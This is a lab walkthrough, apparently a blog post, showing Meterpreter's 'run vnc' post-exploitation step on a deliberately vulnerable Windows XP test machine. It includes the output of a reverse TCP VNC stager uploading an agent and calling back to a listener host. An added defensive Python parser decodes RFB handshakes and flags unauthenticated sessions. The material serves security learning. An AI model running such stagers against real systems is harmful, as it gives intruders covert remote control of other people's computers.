This follows on from a previous post in which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, the Microsoft Internet Information Services (IIS) server and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
This is very cool. The following installs a VNC session on the exploited Windows system and gives me a graphical interface window of the target desktop to manipulate as if I were sitting at the machine.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.70 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\nMsMIPZFPZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.70:4545…
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name “lab”
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
And up popped the target machine desktop:
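The viewer messages above follow the RFB handshake: version banner, security negotiation, then a ServerInit message carrying the pixel format and desktop name. As an added example (not code from the original post), this Python parser decodes the server side of an RFB 3.8 session from captured bytes and reports whether the server offers the None security type, which is what a monitor would flag on a connection like the one to port 4545. Assumptions: the function name, the constructed sample bytes (1024x768 and depth 24 are made up), and that only None was offered; the TightVNC extension negotiation is not decoded.

```python
import struct

# Security type numbers from the RFB specification (RFC 6143).
SEC_NAMES = {1: "None", 2: "VNC Authentication"}

def parse_rfb_server_stream(data: bytes) -> dict:
    """Decode the server-to-client bytes that open an RFB 3.8 session."""
    if len(data) < 13 or data[:4] != b"RFB " or data[11:12] != b"\n":
        raise ValueError("stream does not start with an RFB version banner")
    version = data[4:11].decode("ascii")
    if version != "003.008":
        raise ValueError("only the 3.8 handshake is decoded here")
    count = data[12]                      # number of security types offered
    offered = list(data[13:13 + count])
    if len(offered) != count:
        raise ValueError("truncated security type list")
    info = {
        "version": version,
        "offered": [SEC_NAMES.get(t, f"type {t}") for t in offered],
        "none_auth_offered": 1 in offered,  # session needs no credentials
    }
    if offered != [1]:
        return info   # other types insert their own messages; stop here
    pos = 13 + count
    (result,) = struct.unpack_from(">I", data, pos)  # SecurityResult, 0 = OK
    info["security_result_ok"] = result == 0
    if result != 0:
        return info
    pos += 4
    # ServerInit: width, height, 16-byte pixel format, name length, name.
    width, height = struct.unpack_from(">HH", data, pos)
    bpp, depth, big_endian, true_colour, rmax, gmax, bmax, rs, gs, bs = \
        struct.unpack_from(">BBBBHHHBBB3x", data, pos + 4)
    (name_len,) = struct.unpack_from(">I", data, pos + 20)
    name = data[pos + 24:pos + 24 + name_len].decode("latin-1")
    info.update(width=width, height=height, bits_per_pixel=bpp, depth=depth,
                least_significant_byte_first=not big_endian,
                true_colour=bool(true_colour), max_rgb=(rmax, gmax, bmax),
                shifts=(rs, gs, bs), desktop_name=name)
    return info

# Constructed sample: server bytes matching the values the viewer printed.
SAMPLE = (b"RFB 003.008\n" + bytes([1, 1]) + struct.pack(">I", 0)
          + struct.pack(">HH", 1024, 768)
          + struct.pack(">BBBBHHHBBB3x", 32, 24, 0, 1, 255, 255, 255, 16, 8, 0)
          + struct.pack(">I", 3) + b"lab")

if __name__ == "__main__":
    print(parse_rfb_server_stream(SAMPLE))
```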